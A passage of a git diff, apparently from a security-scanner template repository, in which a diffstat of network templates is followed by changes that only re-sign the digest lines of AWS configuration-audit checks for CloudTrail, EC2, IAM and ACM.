network/enumeration/kafka-topics-list.yaml | 2 +- network/enumeration/mongodb-info-enum.yaml | 2 +- network/enumeration/niagara-fox-info-enum.yaml | 2 +- network/enumeration/psql-user-enum.yaml | 2 +- network/enumeration/smtp/smtp-commands-enum.yaml | 2 +- network/enumeration/smtp/smtp-user-enum.yaml | 2 +- network/exposures/cisco-smi-exposure.yaml | 2 +- network/exposures/exposed-adb.yaml | 2 +- network/exposures/exposed-dockerd.yaml | 2 +- network/exposures/exposed-redis.yaml | 2 +- network/exposures/exposed-zookeeper.yaml | 2 +- network/honeypot/adbhoney-honeypot-cnxn-detect.yaml | 2 +- network/honeypot/adbhoney-honeypot-shell-detect.yaml | 2 +- network/honeypot/conpot-siemens-honeypot-detect.yaml | 2 +- network/honeypot/cowrie-ssh-honeypot-detect.yaml | 2 +- network/honeypot/dionaea-ftp-honeypot-detect.yaml | 2 +- network/honeypot/dionaea-mqtt-honeypot-detect.yaml | 2 +- network/honeypot/dionaea-mysql-honeypot-detect.yaml | 2 +- network/honeypot/dionaea-smb-honeypot-detect.yaml | 2 +- network/honeypot/gaspot-honeypot-detect.yaml | 2 +- network/honeypot/mailoney-honeypot-detect.yaml | 2 +- network/honeypot/redis-honeypot-detect.yaml | 2 +- network/jarm/c2/cobalt-strike-c2-jarm.yaml | 2 +- network/jarm/c2/covenant-c2-jarm.yaml | 2 +- network/jarm/c2/deimos-c2-jarm.yaml | 2 +- network/jarm/c2/evilginx2-jarm.yaml | 2 +- network/jarm/c2/generic-c2-jarm.yaml | 2 +- network/jarm/c2/grat2-c2-jarm.yaml | 2 +- network/jarm/c2/havoc-c2-jarm.yaml | 2 +- network/jarm/c2/mac-c2-jarm.yaml | 2 +- network/jarm/c2/macshell-c2-jarm.yaml | 2 +- network/jarm/c2/merlin-c2-jarm.yaml | 2 +- network/jarm/c2/metasploit-c2-jarm.yaml | 2 +- network/jarm/c2/mythic-c2-jarm.yaml | 2 +- network/jarm/c2/posh-c2-jarm.yaml | 2 +- network/jarm/c2/shad0w-c2-jarm.yaml | 2 +- network/jarm/c2/silenttrinity-c2-jarm.yaml | 2 +- network/jarm/c2/sliver-c2-jarm.yaml | 2 +- network/misconfig/apache-dubbo-unauth.yaml | 2 +- network/misconfig/apache-rocketmq-broker-unauth.yaml | 2 +- network/misconfig/clamav-unauth.yaml | 2 +- network/misconfig/clickhouse-unauth.yaml | 2 +- network/misconfig/erlang-daemon.yaml | 2 +- network/misconfig/ganglia-xml-grid-monitor.yaml | 2 +- network/misconfig/memcached-stats.yaml | 2 +- network/misconfig/mongodb-unauth.yaml | 2 +- network/misconfig/mysql-native-password.yaml | 2 +- network/misconfig/printers-info-leak.yaml | 2 +- network/misconfig/sap-router-info-leak.yaml | 2 +- network/misconfig/tidb-native-password.yaml | 2 +- network/misconfig/tidb-unauth.yaml | 2 +- network/misconfig/unauth-psql.yaml | 2 +- network/vulnerabilities/clockwatch-enterprise-rce.yaml | 2 +- passive/cves/2024/CVE-2024-25723.yaml | 2 +- ssl/c2/sliver-c2.yaml | 2 +- ssl/c2/venomrat.yaml | 2 +- ssl/deprecated-tls.yaml | 2 +- 2476 files changed, 2477 insertions(+), 2509 deletions(-) diff --git a/cloud/aws/acm/acm-cert-renewal-30days.yaml b/cloud/aws/acm/acm-cert-renewal-30days.yaml index 35bfa57300..8db8004e41 100644 --- a/cloud/aws/acm/acm-cert-renewal-30days.yaml +++ b/cloud/aws/acm/acm-cert-renewal-30days.yaml @@ -55,4 +55,4 @@ code: - type: dsl dsl: - '"The AWS ACM Certificate " + certificate +" is about to expire in 30 days"' -# digest: 4a0a004730450220756b5be6dcc7136b4b633c69403bc8a7d096c35c2a8275b99855b974e5c6ddd102210097de27a237f011112a45966e4320e15b0b9ee2af6762bd66817106963c31b0d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bc7d6e62968fc709c8201354d29b61784664ef5c5ebed70a6a8b305447b93725022100bad54d48aab6fdd1356608d1940730ea10536641398de6172861695612abd412:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/acm/acm-cert-renewal-45days.yaml b/cloud/aws/acm/acm-cert-renewal-45days.yaml index 3298230cc4..08339d9656 100644 --- a/cloud/aws/acm/acm-cert-renewal-45days.yaml +++ b/cloud/aws/acm/acm-cert-renewal-45days.yaml @@ -55,4 +55,4 @@ code: - type: dsl dsl: - '"The AWS ACM Certificate " + certificate +" is about to expire in 30 days"' -# digest: 490a00463044022030b5597eb0c060a9e40e23a74f07216222b2df8f53391b091624a8fb3a5fc7b8022007201e8fa3b8699eed20222e46d207fb8b271fbc1c20092e96bb5a2d3740a5d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202b2fedb03a19db3f9d0f87fdc3982c926a2478e6e2903d2fbb55b63561d3a29c0220337c43e0512cc540287235d9f3489fb5af0dc783ae118c4341c27e2812a8d8c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/acm/acm-cert-validation.yaml b/cloud/aws/acm/acm-cert-validation.yaml index 68ba508649..5124cf0262 100644 --- a/cloud/aws/acm/acm-cert-validation.yaml +++ b/cloud/aws/acm/acm-cert-validation.yaml @@ -54,4 +54,4 @@ code: - type: dsl dsl: - '"The issue/renewal request for " + certificatearn + " SSL/TLS certificate was not validated"' -# digest: 4a0a0047304502210089639de3f7c36e53216707ebb4296d7ca7744e1227c45977772e3a5a2fa492e2022032c5f3a8a70224d2aad87a042558ad554bc58170e274510715cca40dc0e67ec3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210092b18eb3a24d6dea12fc385763c84745bf8201424ef620661e9c9fbb1b3b513a02201dc10c6f007cea631d51e81c2b6c883bf6c530a4de13398dea1c605b4a925714:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/acm/acm-wildcard-cert.yaml b/cloud/aws/acm/acm-wildcard-cert.yaml index 7ebaa3dc61..268397aea5 100644 --- a/cloud/aws/acm/acm-wildcard-cert.yaml +++ b/cloud/aws/acm/acm-wildcard-cert.yaml @@ -54,4 +54,4 @@ code: - type: dsl dsl: - 'certificatearn + " AWS ACM certificate is a wildcard certificate"' -# digest: 4a0a00473045022100f6ea9830b40920522f8151d891ae384572efefa30076cbf061bb313303abe50d022030dcf2a11227f66c51c43294228e264bf6b0eee1ae359cc2b84272c834de6351:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022078c25c2aeb4e1ecb7851bfcf3e176bbd0eff547432a2a5ec04d150b1c3fbfdaf022100b3e428a513082fb7357f95e92309d0dfe47823bc6eb40cc403cc2836756ccd60:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/aws-code-env.yaml b/cloud/aws/aws-code-env.yaml index 71672fd4dc..259558caac 100644 --- a/cloud/aws/aws-code-env.yaml +++ b/cloud/aws/aws-code-env.yaml @@ -52,4 +52,4 @@ code: - type: dsl dsl: - '"AWS CLI is properly configured for account \"" + account + "\" and all the necessary tools required are installed"' -# digest: 4b0a00483046022100a05a196d8113f7a6f2a0ad341f9cecb882fe6fb7067812b6fc3d60482a736759022100a2d1867891aecfc696770bef70553de20c1cf97b6dbb29a4158fee3a08522c69:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c79a6583acb05a00dfa742962972031f8c42ae9ce85aabc1c9edb1ae7ebd9368022100b98762cb406a952a4115e28bb639f0d16d02e0b737012da638e3bf3f5d73f5f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/cloudtrail/cloudtrail-data-events.yaml b/cloud/aws/cloudtrail/cloudtrail-data-events.yaml index f11ba86322..6ca863f403 100644 --- a/cloud/aws/cloudtrail/cloudtrail-data-events.yaml +++ b/cloud/aws/cloudtrail/cloudtrail-data-events.yaml @@ -54,4 +54,4 @@ code: - type: dsl dsl: - '"CloudTrail trail" + trail + " is not configured to capture resource operations performed on or within an AWS cloud resource"' -# digest: 490a0046304402201faa9752ffea7342ad3012c17528ce7ac93a419f258bc0022f82daca0c116b060220047829932aa4d96d6a578faf2884e39bb46badf9ec8f4f4704a2cabdc2cc93a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100da87f9b597db66bbcf87384782b53d2b838ad5c8b6c89924afc2607aa6c92bdf022100849208d4cb009645e9a5d9bf73dd7dfa351b390b23991bffa72a85d99ca0ac4c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/cloudtrail/cloudtrail-disabled.yaml b/cloud/aws/cloudtrail/cloudtrail-disabled.yaml index 0a71fc88a0..c13330de8e 100644 --- a/cloud/aws/cloudtrail/cloudtrail-disabled.yaml +++ b/cloud/aws/cloudtrail/cloudtrail-disabled.yaml @@ -54,4 +54,4 @@ code: - type: dsl dsl: - '"CloudTrail trail" + trail + " is not configured to receive log files from all the AWS cloud regions"' -# digest: 490a0046304402201443ece0d6b4fbc1cddf7c13cedcdea324540e873081d0b64225178ee3dc2d1402203d677bdd02490a8f5a90d8e2abfa5499df844303bd18b1c2250ee3737a6ce1c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a7330af1aa9ad989dc95304b0e71f8479849de9782179443c3b7caf9d9373add022034c783da46b9b3b530bbb04d08b70e1803c5d298104e3d65659addd1a8c839d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/cloudtrail/cloudtrail-dup-logs.yaml b/cloud/aws/cloudtrail/cloudtrail-dup-logs.yaml index 82cdf1b73c..1620c82ad8 100644 --- a/cloud/aws/cloudtrail/cloudtrail-dup-logs.yaml +++ b/cloud/aws/cloudtrail/cloudtrail-dup-logs.yaml @@ -54,4 +54,4 @@ code: - type: dsl dsl: - '"Ensure only one trail in Amazon CloudTrail is configured for global service events to avoid duplicates: " + trail' -# digest: 4a0a00473045022100863a23e0d723ae8fd1912b96f52fdd5a22168d4fedd110138ac6b8e75434ef83022040c6c4f2d88276a08fc5faa9c4601c70615bcf8d0969cbe2dbf642c7f8186b43:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c35edad75ea1ac20bfb4e2cbe8b2b4e8fc3b29c40e7ff611808957ab6d83f303022100a77f7c148769b6ca2d6277298d4a5269e1bb2092f609f67cef8e8152a67f02eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/cloudtrail/cloudtrail-global-disabled.yaml b/cloud/aws/cloudtrail/cloudtrail-global-disabled.yaml index f611b53de0..4f75b39816 100644 --- a/cloud/aws/cloudtrail/cloudtrail-global-disabled.yaml +++ b/cloud/aws/cloudtrail/cloudtrail-global-disabled.yaml @@ -54,4 +54,4 @@ code: - type: dsl dsl: - '"CloudTrail trail" + trail + " is not configured to record API calls for AWS global services"' -# digest: 4a0a004730450221009edff671d27bdeaf0556428297d56afb1404ff3032d9ae4b61578c2b239ec4c502202ea0baf81ef1917992591736e8dfd44578f85f84bbb8c869fca718fecefac3c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f10c2c9b4cb87ac0e4d1bdcdbf1f22db6d84b775136499410fe1fd92ba1ad9c5022100eecaa6515470a95ff633ad2df025ded9d8c20f051189a648b1f862861ceb3599:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/cloudtrail/cloudtrail-integrated-cloudwatch.yaml b/cloud/aws/cloudtrail/cloudtrail-integrated-cloudwatch.yaml index 8afe78e695..4c31153a22 100644 --- a/cloud/aws/cloudtrail/cloudtrail-integrated-cloudwatch.yaml +++ b/cloud/aws/cloudtrail/cloudtrail-integrated-cloudwatch.yaml @@ -54,4 +54,4 @@ code: - type: dsl dsl: - '"CloudTrail trail" + trail + " is not configured to send events to CloudWatch Logs for monitoring purposes"' -# digest: 4a0a00473045022003841e6c5e526ca9c51573554cb8b79f921518607b91025823f13325bc700fd7022100c936d849e5d2106d6079dc7524894c444881996c94755ba76bff9a313b01b47b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008bdf150f8abb8be1e258c067aae73857443f219a130cf41d0cc3d9c0c6d45ab302205479a358041954f9d0aa04b2145860008c3732d303a381268f0c31a0148495dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/cloudtrail/cloudtrail-log-integrity.yaml b/cloud/aws/cloudtrail/cloudtrail-log-integrity.yaml index 0de14fa413..9511e9b965 100644 --- a/cloud/aws/cloudtrail/cloudtrail-log-integrity.yaml +++ b/cloud/aws/cloudtrail/cloudtrail-log-integrity.yaml @@ -54,4 +54,4 @@ code: - type: dsl dsl: - '"The log file integrity validation is not enabled for CloudTrail trail" + trail' -# digest: 4a0a00473045022100facdee59eb1d2eca53313cf4f8de941c2f7a0857645f153ad2a64c81b51d9a67022059981aa1842b49de13fc78b6673e74c755632f673f08c402ad66f59074cc2e37:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e301d2ce8df52b0170dbbbee6ca44cc69ea46fd81c0ff3dd3264dc81a8548c2402206321af47afdb4655e6ed862dbdc015d73cf98840e24c43636f0a2a28e2feb81c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/cloudtrail/cloudtrail-logs-not-encrypted.yaml b/cloud/aws/cloudtrail/cloudtrail-logs-not-encrypted.yaml index 2db0fdd6c5..26b5c84fb8 100644 --- a/cloud/aws/cloudtrail/cloudtrail-logs-not-encrypted.yaml +++ b/cloud/aws/cloudtrail/cloudtrail-logs-not-encrypted.yaml @@ -61,4 +61,4 @@ code: - type: dsl dsl: - '"CloudTrail trail " + trail + " is not configured to encrypt log files using SSE-KMS encryption"' -# digest: 4b0a00483046022100b39586900f3cb7a7ce2582be709c7b3d1b25bceaf0f6d35887c3a3d62bfff8d80221009aa3a72ddade09b522655349a54b6cb7e6e0ebd3b36d85b30899b283e77dc90d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fb8aa2e414f88294926325f90076733d4a7d4af4ac18c47b9b82564412f5a2250220104bc5c6dcda1248db44229720dda05561319e3549bb6437ea1c97c6c099421c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/cloudtrail/cloudtrail-mfa-delete.yaml b/cloud/aws/cloudtrail/cloudtrail-mfa-delete.yaml index 85305d7410..ff60b9dc2b 100644 --- a/cloud/aws/cloudtrail/cloudtrail-mfa-delete.yaml +++ b/cloud/aws/cloudtrail/cloudtrail-mfa-delete.yaml @@ -71,4 +71,4 @@ code: - type: dsl dsl: - '"The MFA Delete feature is not enabled for the S3 bucket " + bucket + " associated with the CloudTrail " + trail' -# digest: 490a00463044022042298637fc3947aaaab32dc59fb448c2c08e310bc0ca8a81f04d219b3e3643e4022029d99b37008c16622b5f08d7c27548c42cbfa80b8face6e766a180fe14abb003:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022003bb18e55eae6aa19233a988216a85ab85d1321a68dee66dc295ce19735d9900022100bbfbf82a13f2a4e5693299287c29e50507941e1576d01425abdb7a5b0e68f775:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/cloudtrail/cloudtrail-mgmt-events.yaml b/cloud/aws/cloudtrail/cloudtrail-mgmt-events.yaml index 87ed17a9c4..6ee0dccdf4 100644 --- a/cloud/aws/cloudtrail/cloudtrail-mgmt-events.yaml +++ b/cloud/aws/cloudtrail/cloudtrail-mgmt-events.yaml @@ -54,4 +54,4 @@ code: - type: dsl dsl: - '"CloudTrail trail" + trail + " is not configured to capture management operations performed on your AWS cloud resources"' -# digest: 4a0a00473045022071c61afb61f0c431e2f7edf10563f582ede9a3a52e70a847ac8c6423758f5777022100e921cca38de3640c42ba86369837d9015c0b7b371c218eac3281f789392f77bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f0879bcbe45c9ed0c8921338f6384c009e9a4e2b4e9b8199e3b462fcb93ca7bb02202ba77a0927be3707abc226f4b5d0c4116cd8f2b4d463e8f822e8defbe7934e4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/cloudtrail/cloudtrail-public-buckets.yaml b/cloud/aws/cloudtrail/cloudtrail-public-buckets.yaml index d38f83bbb9..2e00ce9ce7 100644 --- a/cloud/aws/cloudtrail/cloudtrail-public-buckets.yaml +++ b/cloud/aws/cloudtrail/cloudtrail-public-buckets.yaml @@ -54,4 +54,4 @@ code: - type: dsl dsl: - '"CloudTrail trail" + trail + " is not configured to record API calls for AWS global services"' -# digest: 4a0a00473045022039127acbaf7f578247fb47cdfe1a2fdd2a67e57bca815a7786011743df98451c022100c8e1b247da863d14ae8ba023a1f7d05ea77faf28cc1d1c4eb5752c0976d54b0b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220153c8058c6e3274fd6caf2b309baa876492c64fa5978590b21938000e9416aa6022100faaf8886e0deb971d17b2f325fc402814e59ce66ff16ea343543e3b6b3f13773:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/cloudtrail/cloudtrail-s3-bucket-logging.yaml b/cloud/aws/cloudtrail/cloudtrail-s3-bucket-logging.yaml index c8d1d37749..673958d64a 100644 --- a/cloud/aws/cloudtrail/cloudtrail-s3-bucket-logging.yaml +++ b/cloud/aws/cloudtrail/cloudtrail-s3-bucket-logging.yaml @@ -71,4 +71,4 @@ code: - type: dsl dsl: - '"Access logging is not enabled for the S3 bucket associated with CloudTrail trail " + trail' -# digest: 4a0a00473045022100fc881c1ddc9a2e0229e8f3fbac211a1e5c3b7dac4363cd0611c002a55f455dc602201c3c0d885e1b03e7c10a09dbe42871bd2eeb1ffb62360ece9e5297a0d07e6953:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bfe94b20d18063458c694381cd23f96dd8023473e8b9e8151922295b88bff033022044b9f7a79baa2caa0d4ae5406a2701c73c77ddc43da72190b32f1e6ec1fa21ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/cloudtrail/s3-object-lock-not-enabled.yaml b/cloud/aws/cloudtrail/s3-object-lock-not-enabled.yaml index ff7ca0f378..6f4296da9d 100644 --- a/cloud/aws/cloudtrail/s3-object-lock-not-enabled.yaml +++ b/cloud/aws/cloudtrail/s3-object-lock-not-enabled.yaml @@ -72,4 +72,4 @@ code: - type: dsl dsl: - '"The Object Lock feature is not enabled for the S3 bucket associated with the CloudTrail trail " + trail' -# digest: 4b0a00483046022100cdae2dc4719a039aae0873a5c1a1b4f5797593a1f555ee93a6752d408a181ebd022100f0decf46ad9b338bbcd2ea531acf088dcb76a0e605d9d7032130351113b92b43:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100adf9327a943f74cada1c893502adad96b8db198c24c0211486944503bc818dc202205d41291ad41820b5afe0d7d1eb4061acde307124ff04b588b1cb3fbeec75f54c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/cloudwatch/cw-alarm-action-set.yaml b/cloud/aws/cloudwatch/cw-alarm-action-set.yaml index 37ba76c60e..ee2b45093d 100644 --- a/cloud/aws/cloudwatch/cw-alarm-action-set.yaml +++ b/cloud/aws/cloudwatch/cw-alarm-action-set.yaml @@ -54,4 +54,4 @@ code: - type: dsl dsl: - '"The Amazon CloudWatch " + alarm +" is not configured with any actions for the ALARM state."' -# digest: 4a0a004730450220699edd21da9a908d8160230a38300e78c76cce31988d83565ed8b7a0c9b41d70022100c607f34933362074e992f81390dae32347f888ffa68a9d97aac8aad03a388f55:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f3558add899cfc87cef41ebadd1b931c1250bf0f7255e53a67e1aa663b37925b02204010a3c40e8a0ad49ac62d537bcf1a2e4da4d59b40ebc78d5c56e03d1f89348d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/cloudwatch/cw-alarms-actions.yaml b/cloud/aws/cloudwatch/cw-alarms-actions.yaml index e46968007b..b228c92c48 100644 --- a/cloud/aws/cloudwatch/cw-alarms-actions.yaml +++ b/cloud/aws/cloudwatch/cw-alarms-actions.yaml @@ -54,4 +54,4 @@ code: - type: dsl dsl: - '"The Amazon CloudWatch " + alarm + " does not have any active actions configured"' -# digest: 4b0a00483046022100c25b4a5bed3d8e28421708a03ab05c2b09f619f6c38472a34377d2db18e4d730022100d057819cf7fbf55503e3a93b82daa4b438fb204056422e34bbcb5a6ddb4d425e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204f22697b5c7a4b568fa37b48600e0f99f469922bdd208491966d4eef4fd6355d02204f33504b85a9de2df430dde270e0f481760be59ca0340bb93c245143558b0444:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/ec2/ec2-imdsv2.yaml b/cloud/aws/ec2/ec2-imdsv2.yaml index 00550b5c9c..802e36a5c5 100644 --- a/cloud/aws/ec2/ec2-imdsv2.yaml +++ b/cloud/aws/ec2/ec2-imdsv2.yaml @@ -53,4 +53,4 @@ code: - type: dsl dsl: - 'ami + " is publically shared"' -# digest: 4b0a00483046022100a9c93182cc816c3d5bc33cf11b0b8fa7f667153ee8f1c742c1c50da21309f666022100eec3b3b58d54dc9609e9b3b5cbe5feefd239ed07c12958cf75456d961aa3258a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022014b5f386ded068e3ca4990545da3f49124b5e48e86bea8ea94a380c367e3aeb9022100ed0ecb915d4c1b7be7a7906ffa2a55a2988669e3418301b6886a45df6a57b337:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/ec2/ec2-public-ip.yaml b/cloud/aws/ec2/ec2-public-ip.yaml index 90676c0e77..5243b53fb9 100644 --- a/cloud/aws/ec2/ec2-public-ip.yaml +++ b/cloud/aws/ec2/ec2-public-ip.yaml @@ -54,4 +54,4 @@ code: - type: dsl dsl: - '"The Amazon Instance " + ec2instance + " uses public IP addresses"' -# digest: 4a0a00473045022100f1dcc6e7fab82b9688102b0f02fddc8c9930007bc885800ac26e4e5ea412ed670220667fdf2d67ebff9d4346a853856402dbd78197c727feae253e6629f53de0f957:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d6d48dea82c4b3c88a81c6060dbedadb56502f1d2b692dd7d309e67b7d20504602203063ae7dcaa055dc54d9d6f0f534a96feb3966280b2a9004201fc21fe7752964:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/ec2/ec2-sg-egress-open.yaml b/cloud/aws/ec2/ec2-sg-egress-open.yaml index caeb3f76be..8d7f92805c 100644 --- a/cloud/aws/ec2/ec2-sg-egress-open.yaml +++ b/cloud/aws/ec2/ec2-sg-egress-open.yaml @@ -55,4 +55,4 @@ code: - type: dsl dsl: - '"Amazon EC2 security group(s) " + groupid + " allows unrestricted outbound traffic"' -# digest: 490a0046304402200e8c75db5d5e8809d4e97173605a8d845e49d80bd788de5a7ba6cefc77f9110202200e57d1342300e4858c189e8dd15e8084cbf17f2f75ab3f8fbe8134979f4a6bbe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022020d4b03ec7e884a6a9516b16ab27112d3d1e307bdd145875d8a47c5f85e8c5dd022100c3bcec6be21508dcf10fe542df392d777029d8f8658479f1690c7d38f234f7fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/ec2/ec2-sg-ingress.yaml b/cloud/aws/ec2/ec2-sg-ingress.yaml index e24dbebbb3..8acf92da3a 100644 --- a/cloud/aws/ec2/ec2-sg-ingress.yaml +++ b/cloud/aws/ec2/ec2-sg-ingress.yaml @@ -55,4 +55,4 @@ code: - type: dsl dsl: - '"Amazon EC2 security group(s) " + groupid + " allows unrestricted inbound traffic"' -# digest: 4b0a004830460221009b9e3e94679739de1a688c3b15bc4f592472272245df9bfbc675211eeaa6f45602210097597c2bae7f04a1d2440e25e37986679daa91e6e8fe277cb1fb99874d2e5fd0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100881b4639e87b866a26e2397b65cebda755a3e870faa83f93122314e58a111837022100bf8b00a4e7ac9fc0f71faf6314470a221c9a95af8b3590c7076267d4badd9592:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/ec2/publicly-shared-ami.yaml b/cloud/aws/ec2/publicly-shared-ami.yaml index 4605660d0b..4116d4e60a 100644 --- a/cloud/aws/ec2/publicly-shared-ami.yaml +++ b/cloud/aws/ec2/publicly-shared-ami.yaml @@ -54,4 +54,4 @@ code: - type: dsl dsl: - 'ami + " AMI is publically shared"' -# digest: 4a0a004730450220193e6725ccb97bbd7071e4dad36601e0e8625dd4901a653eacf3141faf6e8a82022100d7d61c14183f4a6563ac749634aa9af5e01332d52583cba6e703cf4958bbe63f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202170a728aa9a257c4f5c57f8cbe604df3b4288eb8d54deeaf7e1c8961e392c4d022100c0f6fffcdfbf887cdf6b0bf253f5d468b33670e054ff2669b3dc4c2245560595:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/ec2/unencrypted-aws-ami.yaml b/cloud/aws/ec2/unencrypted-aws-ami.yaml index 1a47dfc0e8..84204c750c 100644 --- a/cloud/aws/ec2/unencrypted-aws-ami.yaml +++ b/cloud/aws/ec2/unencrypted-aws-ami.yaml @@ -54,4 +54,4 @@ code: - type: dsl dsl: - 'ami + " AMI is not encrypted"' -# digest: 4a0a00473045022100a7b00e475c508994eab83d044d65086d511d0dcdde83abed644133c35775d4a402203ff217b94895c174e5d6036a27c3cedba4e74cc0b2a4fb957b71390c2d7454eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022006b2a8f1493aca05a5bbb6dd85e177cfacec3cf7e380e0bdd32179719555a881022100f893098f309383eacc3b8fff8a3394101a3bd39897babe77b4ac0911555498ba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/iam/iam-full-admin-privileges.yaml b/cloud/aws/iam/iam-full-admin-privileges.yaml index 20266828a5..cc46579707 100644 --- a/cloud/aws/iam/iam-full-admin-privileges.yaml +++ b/cloud/aws/iam/iam-full-admin-privileges.yaml @@ -51,4 +51,4 @@ code: - type: dsl dsl: - '"The IAM policy " + policy +" is Overly Permissive"' -# digest: 4a0a0047304502203eeeb24dbf1cfd3f41550e0c0b66bfb9ba23ea9912139aa2385e48b3a668d336022100dcb4c90fbb816ab247ea9d506497b900640b3d052bb2ce2b2f8b9a9e7fe58d9e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008bc9f722616e4216ee5bccead511cb6086d4f998014314d8a8478ec44f424f40022029c5288eda6b59b7217a8836cb5d506e7b7ad234f6272fe94570815dc7b0d0a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/iam/iam-key-rotation-90days.yaml b/cloud/aws/iam/iam-key-rotation-90days.yaml index b9fdb47c3c..179672de2c 100644 --- a/cloud/aws/iam/iam-key-rotation-90days.yaml +++ b/cloud/aws/iam/iam-key-rotation-90days.yaml @@ -49,4 +49,4 @@ code: - type: dsl dsl: - '"The IAM Key " + accesskey +" is older than 90 days"' -# digest: 4a0a00473045022100d15b76ce838fa09da565afb9414204e3a5bc5487d1cca1ea4fb3560c339ac6f60220291edc1503af6dfa14709487d50d0eff776aafaaf1d07580cc1199ea21fb48ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202a9b12e596c433a426976cc985f93e87eb624f05932b7e78a72dd633496726fa022100db223fbc664946a1d52e6916fa64fb18bb07efcb40ddba5110bb24c8a29d932b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/iam/iam-mfa-enable.yaml b/cloud/aws/iam/iam-mfa-enable.yaml index 42e9a22c2b..07bde276ca 100644 --- a/cloud/aws/iam/iam-mfa-enable.yaml +++ b/cloud/aws/iam/iam-mfa-enable.yaml @@ -48,4 +48,4 @@ code: - type: dsl dsl: - '"MFA is no enabled for IAM User " + user' -# digest: 4a0a00473045022100f326cf9a9fdd5f737d1126dd4938a233059a58f816e7e75a9a0bbab2f9a5d8230220219f4277870b52c124be28db9d8adfe6b88d2ea8b1570756a3f7772384887eff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008072a04e0f68ee2345d1bfeee304675bc22468a061fd9fa3fbed31279e399640022057efc7bfe58fc41c86be4cfdc0870e4d998282ff71b6d70a3da557cb67cd2d09:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/iam/iam-ssh-keys-rotation.yaml b/cloud/aws/iam/iam-ssh-keys-rotation.yaml index 85e10011ea..bc889ba423 100644 --- a/cloud/aws/iam/iam-ssh-keys-rotation.yaml +++ b/cloud/aws/iam/iam-ssh-keys-rotation.yaml @@ -49,4 +49,4 @@ code: - type: dsl dsl: - '"The SSH Public Key " + accesskey +" is older than 90 days"' -# digest: 490a00463044022017e707c66f9a058bd875e7a516d99585a1be526405545647011958874bd784a702201259fdf89b05b2fa171d789e014fe98d7949010ff420be02f0ef7183565544ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 